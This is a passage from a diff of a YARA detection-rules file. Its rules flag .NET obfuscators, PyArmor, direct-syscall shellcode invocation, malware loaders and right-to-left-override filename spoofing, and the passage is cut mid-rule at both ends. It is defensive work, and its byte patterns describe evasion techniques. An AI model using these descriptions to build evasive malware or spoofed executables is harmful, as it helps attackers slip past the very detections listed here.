2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 7a 67 72 61 74 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 6f 73 69 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 6c 6d 74 68 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 6c 6d 65 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 6d 74 68 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 66 74 72 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 6d 68 63 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 61 74 68 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 6b 6e 6c ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 73 6c 78 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 63 6f 64 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } - $ = { E2 80 AE 6d 63 6f 64 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $sa1 = "StackFrame" ascii + $sa2 = "StackTrace" ascii + $sa3 = "Enter" ascii + $sa4 = "Exit" ascii + $op1 = { 11 ?? 18 91 11 ?? 1? 91 1F 10 62 60 11 ?? 1? 91 1E 62 60 11 ?? 17 91 1F 18 62 60 } + $op2 = { D1 28 ?? 00 00 0A 0? 1F 10 63 D1 } + $op3 = { 1F 10 63 D1 28 [3] 0A } + $op4 = { 7B ?? 00 00 04 16 91 02 7B ?? 00 00 04 17 91 1E 62 60 02 7B ?? 00 00 04 18 91 1F 10 62 60 02 7B ?? 00 00 04 19 91 1F 18 62 60 } condition: - 1 of them + uint16(0)==0x5a4d and all of ($sa*) and (2 of ($op*) or #op1==2) } -rule COD3NYM_SUSP_OBF_Pyarmor_Jan24 +rule COD3NYM_Eazfuscator_Code_Virtualization : SUSPICIOUS OBFUSCATION FILE { meta: - description = "Detects PyArmor python code obfuscation. PyArmor is used by various threat actors like BatLoader" + description = "Eazfuscator.NET code virtualization" author = "Jonathan Peters" - id = "2627c764-57ed-5781-8c77-ad2d9f4bd0ee" - date = "2024-01-16" - modified = "2024-01-16" - reference = "https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/other/susp_obf_pyarmor.yar#L1-L18" + id = "d39bba65-1220-5b60-b919-1bd88f1bc7f1" + date = "2024-01-01" + modified = "2024-01-10" + reference = "https://github.com/cod3nym/detection-rules/" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/malcat/obfuscators.yar#L31-L54" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "2727a418f31e8c0841f8c3e79455067798a1c11c2b83b5c74d2de4fb3476b654" - logic_hash = "6bbbe4c9ad54a1d1042b53803ca6011f3eaaeebbe864703e741c25a0d788342f" + hash = "53d5c2574c7f70b7aa69243916acf6e43fe4258fbd015660032784e150b3b4fa" + logic_hash = "7a647973eae9163cb5b82c27141956da58f4a9fd2ad51cf82523b93536cfaea3" score = 65 quality = 80 - tags = "" + tags = "SUSPICIOUS, OBFUSCATION, FILE" + name = "Eazfuscator" + category = "obfuscation" + reliability = 90 + tlp = "TLP:white" strings: - $ = "__pyarmor__" ascii - $ = "pyarmor_runtime" ascii - $ = "pyarmor(__" ascii - $ = { 50 79 61 72 6D 6F 72 20 [5] 20 28 70 72 6F 29 } - $ = { 5F 5F 61 72 6D 6F 72 5F ( 65 78 69 74 | 77 72 61 70 | 65 6E 74 65 72 ) 5F 5F } + $sa1 = "BinaryReader" ascii + $sa2 = "GetManifestResourceStream" ascii + $sa3 = "get_HasElementType" ascii + $op1 = { 28 [2] 00 06 28 [2] 00 06 72 [2] 00 70 ?? 1? 2D 0? 26 26 26 26 2B } + $op2 = { 7E [3] 04 2D 3D D0 [3] 02 28 [3] 0A 6F [3] 0A 72 [3] 70 6F [3] 0A 20 80 00 00 00 8D ?? 00 00 01 25 D0 [3] 04 28 [3] 0A 28 [3] 06 28 [3] 06 80 [3] 04 7E [3] 04 2A } + $op3 = { 02 20 [4] 1F 09 73 [4] 7D [3] 04 } condition: - 2 of them + uint16(0)==0x5a4d and all of ($sa*) and 2 of ($op*) } -rule COD3NYM_SUSP_Direct_Syscall_Shellcode_Invocation_Jan24 : FILE +rule COD3NYM_Confuserex_Naming_Pattern : SUSPICIOUS OBFUSCATION FILE { meta: - description = "Detects direct syscall evasion technqiue using NtProtectVirtualMemory to invoke shellcode" + description = "ConfuserEx Renaming Pattern" author = "Jonathan Peters" - id = "2a0ce887-299d-5aad-bed3-3e698b4dea79" - date = "2024-01-14" - modified = "2024-01-14" - reference = "https://unprotect.it/technique/evasion-using-direct-syscalls/" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/other/susp_direct_syscall_shellcode_invocation.yar#L1-L14" + id = "2b57f135-9d9d-5401-be29-a1053f4249ec" + date = "2024-01-03" + modified = "2024-01-10" + reference = "https://github.com/cod3nym/detection-rules/" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/malcat/obfuscators.yar#L56-L77" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "f7cd214e7460c539d6f8d02b6650098e3983862ff658b76ea02c33f5a45fc836" - logic_hash = "b5b0ad86289a4e2af7cdc909192f4dc9325c1763259f40adcc1e60c088c9e4f3" + logic_hash = "f28f3bd61c6f257cc622f6f323a5b5113d7d7b79ce8b852df02c42af22ecf033" score = 65 quality = 80 - tags = "FILE" + tags = "SUSPICIOUS, OBFUSCATION, FILE" + name = "ConfuserEx" + category = "obfuscation" + reliability = 90 strings: - $ = { B8 40 00 00 00 67 4C 8D 08 49 89 CA 48 C7 C0 50 00 00 00 0F 05 [4-8] 4C 8D 3D 02 00 00 00 FF E0 } + $s1 = "mscoree.dll" ascii + $s2 = "mscorlib" ascii + $s3 = "System.Private.Corlib" ascii + $s4 = "#Strings" ascii + $s5 = { 5F 43 6F 72 [3] 4D 61 69 6E } + $name_pattern = { E2 ( 80 8? | 81 AA ) E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 80 AE} condition: - all of them and filesize <2MB + uint16(0)==0x5a4d and 2 of ($s*) and #name_pattern>5 } -import "pe" - -rule COD3NYM_SUSP_OBF_NET_Reactor_Native_Stub_Jan24 +rule COD3NYM_Confuserex_Packer : SUSPICIOUS OBFUSCATION FILE { meta: - description = "Detects native packer stub for version 4.5-4.7 of .NET Reactor. A pirated copy of version 4.5 of this commercial obfuscation solution is used by various malware families like BlackBit, RedLine, AgentTesla etc." + description = "ConfuserEx Packer" author = "Jonathan Peters" - id = "529dce88-a81d-5a98-aa6c-1f1b739ad074" - date = "2024-01-05" - modified = "2024-01-12" - reference = "https://notes.netbytesec.com/2023/08/understand-ransomware-ttps-blackbit.html" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_net_reactor.yar#L3-L16" + id = "cd53a62f-62e3-58a1-8bc3-7f40949e3f00" + date = "2024-01-09" + modified = "2024-01-10" + reference = "https://github.com/cod3nym/detection-rules/" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/malcat/obfuscators.yar#L79-L99" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "6e8a7adf680bede7b8429a18815c232004057607fdfbf0f4b0fb1deba71c5df7" - logic_hash = "287273babd3cd6bc1986b018367317019f2249851a2c19fc83857f7ff0b90b54" - score = 70 + logic_hash = "43aee4c01b47ca04ee516d418939ec3e90fd08566f2a4b501c4698b7f9e0225d" + score = 65 quality = 80 - tags = "" + tags = "SUSPICIOUS, OBFUSCATION, FILE" + name = "ConfuserEx" + category = "obfuscation" + reliability = 90 strings: - $op = {C6 44 24 18 E0 C6 44 24 19 3B C6 44 24 1A 8D C6 44 24 1B 2A C6 44 24 1C A2 C6 44 24 1D 2A C6 44 24 1E 2A C6 44 24 1F 41 C6 44 24 20 D3 C6 44 24 21 20 C6 44 24 22 64 C6 44 24 23 06 C6 44 24 24 8A C6 44 24 25 F7 C6 44 24 26 3D C6 44 24 27 9D C6 44 24 28 D9 C6 44 24 29 EE C6 44 24 2A 15 C6 44 24 2B 68 C6 44 24 2C F4 C6 44 24 2D 76 C6 44 24 2E B9 C6 44 24 2F 34 C6 44 24 30 BF C6 44 24 31 1E C6 44 24 32 E7 C6 44 24 33 78 C6 44 24 34 98 C6 44 24 35 E9 C6 44 24 36 6F C6 44 24 37 B4} + $s1 = "GCHandle" ascii + $s2 = "GCHandleType" ascii + $op1 = { 5A 20 89 C0 3F 14 6A 5E [8-20] 5A 20 FB 56 4D 44 6A 5E 6D 9E } + $op2 = { 20 61 FF 6F 00 13 ?? 06 13 ?? 16 13 [10-20] 20 1F 3F 5E 00 5A } + $op3 = { 16 91 7E [3] 04 17 91 1E 62 60 7E [3] 04 18 91 1F 10 62 60 7E [3] 04 19 91 1F 18 62 } condition: - for any i in (0..pe.number_of_resources-1) : (pe.resources[i].name_string=="_\x00_\x00") and $op + uint16(0)==0x5a4d and all of ($s*) and 2 of ($op*) } -import "pe" - -rule COD3NYM_SUSP_OBF_NET_Reactor_Indicators_Jan24 : FILE +rule COD3NYM_Reactor_Indicators : SUSPICIOUS OBFUSCATION FILE { meta: - description = "Detects indicators of .NET Reactors managed obfuscation. Reactor is a commercial obfuscation solution, pirated versions are often abused by threat actors." + description = "Ezriz .NET Reactor obfuscator" author = "Jonathan Peters" id = "8dc07bbd-cbeb-5214-a27a-555a0d396197" date = "2024-01-09" - modified = "2024-01-12" - reference = "https://www.eziriz.com/dotnet_reactor.htm" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_net_reactor.yar#L18-L34" + modified = "2024-01-10" + reference = "https://github.com/cod3nym/detection-rules/" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/malcat/obfuscators.yar#L103-L119" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "be842a9de19cfbf42ea5a94e3143d58390a1abd1e72ebfec5deeb8107dddf038" logic_hash = "40a03eb487e2c02a032c4bfb51580dbb764e0a49ceee5ae92c54a5ee3ede9696" score = 65 quality = 80 - tags = "FILE" + tags = "SUSPICIOUS, OBFUSCATION, FILE" + name = ".NET Reactor" + category = "obfuscation" + reliability = 90 strings: $ = { 33 7B 00 [9] 00 2D 00 [9] 00 2D 00 [9] 00 2D 00 [9] 00 7D 00 } @@ -213837,21 +215738,24 @@ rule COD3NYM_SUSP_OBF_NET_Reactor_Indicators_Jan24 : FILE } import "pe" -rule COD3NYM_DOTNET_Singlefilehost_Bundled_App : FILE +rule COD3NYM_Singlefilehost_App_Bundle : COMPILER FILE { meta: - description = "Detects single file host .NET bundled apps." + description = "DotNet singlefilehost app bundle" author = "Jonathan Peters" id = "061bd294-58d6-57be-b8b5-b8a8f31ce316" - date = "2024-01-02" - modified = "2024-01-05" - reference = "https://learn.microsoft.com/en-us/dotnet/core/deploying/single-file" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/framework_identiciation.yar#L3-L17" + date = "2024-01-03" + modified = "2024-01-04" + reference = "https://github.com/cod3nym/detection-rules/" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/malcat/other.yar#L3-L20" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" logic_hash = "12075b07a9feb951898ac8eba303471d9253ed9535db927244e5562f4fad33d6" score = 75 quality = 80 - tags = "FILE" + tags = "COMPILER, FILE" + name = "DotNet" + category = "compiler" + reliability = 90 strings: $ = "singlefilehost.exe" ascii @@ -213860,60 +215764,30 @@ rule COD3NYM_DOTNET_Singlefilehost_Bundled_App : FILE condition: uint16(0)==0x5a4d and 1 of them and pe.exports("DotNetRuntimeInfo") and pe.exports("CLRJitAttachState") } -rule COD3NYM_SUSP_OBF_NET_Confuserex_Name_Pattern_Jan24 : FILE -{ - meta: - description = "Detects Naming Pattern used by ConfuserEx. ConfuserEx is a widely used open source obfuscator often found in malware" - author = "Jonathan Peters" - id = "2b57f135-9d9d-5401-be29-a1053f4249ec" - date = "2024-01-03" - modified = "2024-01-09" - reference = "https://github.com/yck1509/ConfuserEx/tree/master" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_confuserex.yar#L1-L21" - license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "2f67f590cabb9c79257d27b578d8bf9d1a278afa96b205ad2b4704e7b9a87ca7" - logic_hash = "f28f3bd61c6f257cc622f6f323a5b5113d7d7b79ce8b852df02c42af22ecf033" - score = 50 - quality = 80 - tags = "FILE" - - strings: - $s1 = "mscoree.dll" ascii - $s2 = "mscorlib" ascii - $s3 = "System.Private.Corlib" ascii - $s4 = "#Strings" ascii - $s5 = { 5F 43 6F 72 [3] 4D 61 69 6E } - $name_pattern = { E2 ( 80 8? | 81 AA ) E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 [2] E2 80 AE} +import "pe" - condition: - uint16(0)==0x5a4d and 2 of ($s*) and #name_pattern>5 -} -rule COD3NYM_SUSP_OBF_NET_Confuserex_Packer_Jan24 : FILE +rule COD3NYM_SUSP_OBF_NET_Reactor_Native_Stub_Jan24 { meta: - description = "Detects binaries packed with ConfuserEx compression packer. This feature compresses and encrypts the actual image into a stub that unpacks and loads the original image on runtime." + description = "Detects native packer stub for version 4.5-4.7 of .NET Reactor. A pirated copy of version 4.5 of this commercial obfuscation solution is used by various malware families like BlackBit, RedLine, AgentTesla etc." author = "Jonathan Peters" - id = "cd53a62f-62e3-58a1-8bc3-7f40949e3f00" - date = "2024-01-09" - modified = "2024-01-09" - reference = "https://github.com/yck1509/ConfuserEx/tree/master" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_confuserex.yar#L23-L42" + id = "529dce88-a81d-5a98-aa6c-1f1b739ad074" + date = "2024-01-05" + modified = "2024-01-12" + reference = "https://notes.netbytesec.com/2023/08/understand-ransomware-ttps-blackbit.html" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_net_reactor.yar#L3-L16" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "2570bd4c3f564a61d6b3d589126e0940af27715e1e8d95de7863579fbe25f86f" - logic_hash = "43aee4c01b47ca04ee516d418939ec3e90fd08566f2a4b501c4698b7f9e0225d" + hash = "6e8a7adf680bede7b8429a18815c232004057607fdfbf0f4b0fb1deba71c5df7" + logic_hash = "287273babd3cd6bc1986b018367317019f2249851a2c19fc83857f7ff0b90b54" score = 70 quality = 80 - tags = "FILE" + tags = "" strings: - $s1 = "GCHandle" ascii - $s2 = "GCHandleType" ascii - $op1 = { 5A 20 89 C0 3F 14 6A 5E [8-20] 5A 20 FB 56 4D 44 6A 5E 6D 9E } - $op2 = { 20 61 FF 6F 00 13 ?? 06 13 ?? 16 13 [10-20] 20 1F 3F 5E 00 5A} - $op3 = { 16 91 7E [3] 04 17 91 1E 62 60 7E [3] 04 18 91 1F 10 62 60 7E [3] 04 19 91 1F 18 62 } + $op = {C6 44 24 18 E0 C6 44 24 19 3B C6 44 24 1A 8D C6 44 24 1B 2A C6 44 24 1C A2 C6 44 24 1D 2A C6 44 24 1E 2A C6 44 24 1F 41 C6 44 24 20 D3 C6 44 24 21 20 C6 44 24 22 64 C6 44 24 23 06 C6 44 24 24 8A C6 44 24 25 F7 C6 44 24 26 3D C6 44 24 27 9D C6 44 24 28 D9 C6 44 24 29 EE C6 44 24 2A 15 C6 44 24 2B 68 C6 44 24 2C F4 C6 44 24 2D 76 C6 44 24 2E B9 C6 44 24 2F 34 C6 44 24 30 BF C6 44 24 31 1E C6 44 24 32 E7 C6 44 24 33 78 C6 44 24 34 98 C6 44 24 35 E9 C6 44 24 36 6F C6 44 24 37 B4} condition: - uint16(0)==0x5a4d and all of ($s*) and 2 of ($op*) + for any i in (0..pe.number_of_resources-1) : (pe.resources[i].name_string=="_\x00_\x00") and $op } rule COD3NYM_SUSP_NET_Shellcode_Loader_Indicators_Jan24 : FILE { @@ -213944,60 +215818,31 @@ rule COD3NYM_SUSP_NET_Shellcode_Loader_Indicators_Jan24 : FILE condition: uint16(0)==0x5a4d and 3 of ($sa*) and #x==1 } -rule COD3NYM_SUSP_OBF_NET_Eazfuscator_String_Encryption_Jan24 : FILE -{ - meta: - description = "Detects .NET images obfuscated with Eazfuscator string encryption. Eazfuscator is a widely used commercial obfuscation solution used by both legitimate software and malware." - author = "Jonathan Peters" - id = "09a400f5-e837-58c2-9b51-9213c8ab0883" - date = "2024-01-01" - modified = "2024-01-03" - reference = "https://www.gapotchenko.com/eazfuscator.net" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_eazfuscator.yar#L1-L28" - license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "3a9ee09ed965e3aee677043ba42c7fdbece0150ef9d1382c518b4b96bbd0e442" - logic_hash = "5f3f3358e3cfb274aa2e8465dde58a080f9fb282aa519885b9d39429521db6d9" - score = 50 - quality = 80 - tags = "FILE" - - strings: - $sa1 = "StackFrame" ascii - $sa2 = "StackTrace" ascii - $sa3 = "Enter" ascii - $sa4 = "Exit" ascii - $op1 = { 11 ?? 18 91 11 ?? 1? 91 1F 10 62 60 11 ?? 1? 91 1E 62 60 11 ?? 17 91 1F 18 62 60 } - $op2 = { D1 28 ?? 00 00 0A 0? 1F 10 63 D1 } - $op3 = { 1F 10 63 D1 28 [3] 0A } - $op4 = { 7B ?? 00 00 04 16 91 02 7B ?? 00 00 04 17 91 1E 62 60 02 7B ?? 00 00 04 18 91 1F 10 62 60 02 7B ?? 00 00 04 19 91 1F 18 62 60 } - - condition: - uint16(0)==0x5a4d and all of ($sa*) and (2 of ($op*) or #op1==2) -} -rule COD3NYM_SUSP_OBF_NET_Eazfuscator_Virtualization_Jan24 : FILE +rule COD3NYM_MAL_NET_Niximports_Loader_Jan24 : FILE { meta: - description = "Detects .NET images obfuscated with Eazfuscator virtualization protection. Eazfuscator is a widely used commercial obfuscation solution used by both legitimate software and malware." + description = "Detects open-source NixImports .NET malware loader. A stealthy loader using dynamic import resolving to evade static detection" author = "Jonathan Peters" - id = "d39bba65-1220-5b60-b919-1bd88f1bc7f1" - date = "2024-01-02" - modified = "2024-01-03" - reference = "https://www.gapotchenko.com/eazfuscator.net" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/obf_eazfuscator.yar#L30-L51" + id = "f36ad127-4c4b-5b7e-a13c-bfb9d222a438" + date = "2024-01-12" + modified = "2024-01-12" + reference = "https://github.com/dr4k0nia/NixImports/tree/master" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/mal/mal_net_niximports_loader.yar#L1-L22" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "53d5c2574c7f70b7aa69243916acf6e43fe4258fbd015660032784e150b3b4fa" - logic_hash = "7a647973eae9163cb5b82c27141956da58f4a9fd2ad51cf82523b93536cfaea3" - score = 60 + hash = "dd3f22871879b0bc4990c96d1de957848c7ed0714635bb036c73d8a989fb0b39" + logic_hash = "e41d7f4cb46aa0baa87d3024e0550efe5058ca49d908bbd34197431c7c054e58" + score = 80 quality = 80 tags = "FILE" strings: - $sa1 = "BinaryReader" ascii - $sa2 = "GetManifestResourceStream" ascii - $sa3 = "get_HasElementType" ascii - $op1 = { 28 [2] 00 06 28 [2] 00 06 72 [2] 00 70 ?? 1? 2D 0? 26 26 26 26 2B } - $op2 = { 7E [3] 04 2D 3D D0 [3] 02 28 [3] 0A 6F [3] 0A 72 [3] 70 6F [3] 0A 20 80 00 00 00 8D ?? 00 00 01 25 D0 [3] 04 28 [3] 0A 28 [3] 06 28 [3] 06 80 [3] 04 7E [3] 04 2A } - $op3 = { 02 20 [4] 1F 09 73 [4] 7D [3] 04 } + $op1 = { 1F 0A 64 06 1F 11 62 60 } + $op2 = { 03 20 4D 5A 90 00 94 4B 2A } + $op3 = { 20 DE 7A 1F F3 20 F7 1B 18 BC } + $op4 = { 20 CE 1F BE 70 20 DF 1F 3E F8 14 } + $sa1 = "OffsetToStringData" ascii + $sa2 = "GetRuntimeMethods" ascii + $sa3 = "netstandard" ascii condition: uint16(0)==0x5a4d and all of ($sa*) and 2 of ($op*) @@ -214030,40 +215875,127 @@ rule COD3NYM_MAL_NET_Limecrypter_Runpe_Jan24 : FILE condition: uint16(0)==0x5a4d and all of ($s*) and 2 of ($op*) } -rule COD3NYM_MAL_NET_Niximports_Loader_Jan24 : FILE +rule COD3NYM_SUSP_OBF_Pyarmor_Jan24 { meta: - description = "Detects open-source NixImports .NET malware loader. A stealthy loader using dynamic import resolving to evade static detection" + description = "Detects PyArmor python code obfuscation. PyArmor is used by various threat actors like BatLoader" author = "Jonathan Peters" - id = "f36ad127-4c4b-5b7e-a13c-bfb9d222a438" - date = "2024-01-12" - modified = "2024-01-12" - reference = "https://github.com/dr4k0nia/NixImports/tree/master" - source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/dotnet/mal/mal_net_niximports_loader.yar#L1-L22" + id = "2627c764-57ed-5781-8c77-ad2d9f4bd0ee" + date = "2024-01-16" + modified = "2024-01-16" + reference = "https://www.trendmicro.com/en_us/research/23/h/batloader-campaigns-use-pyarmor-pro-for-evasion.html" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/other/susp_obf_pyarmor.yar#L1-L18" license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" - hash = "dd3f22871879b0bc4990c96d1de957848c7ed0714635bb036c73d8a989fb0b39" - logic_hash = "e41d7f4cb46aa0baa87d3024e0550efe5058ca49d908bbd34197431c7c054e58" - score = 80 + hash = "2727a418f31e8c0841f8c3e79455067798a1c11c2b83b5c74d2de4fb3476b654" + logic_hash = "6bbbe4c9ad54a1d1042b53803ca6011f3eaaeebbe864703e741c25a0d788342f" + score = 65 + quality = 80 + tags = "" + + strings: + $ = "__pyarmor__" ascii + $ = "pyarmor_runtime" ascii + $ = "pyarmor(__" ascii + $ = { 50 79 61 72 6D 6F 72 20 [5] 20 28 70 72 6F 29 } + $ = { 5F 5F 61 72 6D 6F 72 5F ( 65 78 69 74 | 77 72 61 70 | 65 6E 74 65 72 ) 5F 5F } + + condition: + 2 of them +} +rule COD3NYM_SUSP_Direct_Syscall_Shellcode_Invocation_Jan24 : FILE +{ + meta: + description = "Detects direct syscall evasion technqiue using NtProtectVirtualMemory to invoke shellcode" + author = "Jonathan Peters" + id = "2a0ce887-299d-5aad-bed3-3e698b4dea79" + date = "2024-01-14" + modified = "2024-01-14" + reference = "https://unprotect.it/technique/evasion-using-direct-syscalls/" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/other/susp_direct_syscall_shellcode_invocation.yar#L1-L14" + license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" + hash = "f7cd214e7460c539d6f8d02b6650098e3983862ff658b76ea02c33f5a45fc836" + logic_hash = "b5b0ad86289a4e2af7cdc909192f4dc9325c1763259f40adcc1e60c088c9e4f3" + score = 65 quality = 80 tags = "FILE" strings: - $op1 = { 1F 0A 64 06 1F 11 62 60 } - $op2 = { 03 20 4D 5A 90 00 94 4B 2A } - $op3 = { 20 DE 7A 1F F3 20 F7 1B 18 BC } - $op4 = { 20 CE 1F BE 70 20 DF 1F 3E F8 14 } - $sa1 = "OffsetToStringData" ascii - $sa2 = "GetRuntimeMethods" ascii - $sa3 = "netstandard" ascii + $ = { B8 40 00 00 00 67 4C 8D 08 49 89 CA 48 C7 C0 50 00 00 00 0F 05 [4-8] 4C 8D 3D 02 00 00 00 FF E0 } condition: - uint16(0)==0x5a4d and all of ($sa*) and 2 of ($op*) + all of them and filesize <2MB +} +rule COD3NYM_SUSP_RLO_Exe_Extension_Spoofing_Jan24 +{ + meta: + description = "Detects Right-To-Left (RLO) Unicode (U+202E) extension spoofing for .exe files" + author = "Jonathan Peters" + id = "60c1a8db-6bfc-547b-98d9-21c198a703f0" + date = "2024-01-14" + modified = "2024-02-19" + reference = "https://unprotect.it/technique/right-to-left-override-rlo-extension-spoofing/" + source_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/yara/other/susp_rlo_exe_extension_spoofing.yar#L2-L58" + license_url = "https://github.com/cod3nym/detection-rules//blob/ad485bff0ce30afb56e367b7f2b76fea81e78fc9/LICENSE.md" + hash = "cae0ab10f7c1afd7941aff767a9b59901270e3de4d44167e932dae0991515487" + logic_hash = "6126f36b3cd695b4002c29c9163faa6ec295699863d8db7fe17afc407f5a5736" + score = 70 + quality = 55 + tags = "" + + strings: + $ = { E2 80 AE 76 73 63 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 66 64 70 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 78 73 6C 78 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 78 63 6F 64 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 70 69 7A ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 67 6E 70 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 67 65 70 6A ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 67 70 6A ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 6E 6C 73 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 74 78 74 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 66 64 70 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 78 74 70 70 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 74 64 6f ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 63 74 65 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 66 69 67 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 70 6d 62 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 66 66 69 74 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 67 76 73 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 34 70 6d ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 69 76 61 ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 76 6f 6d ( 2E 2E | 2E ) ( 65 78 65 | 73 63 72 ) } + $ = { E2 80 AE 76 6d 77 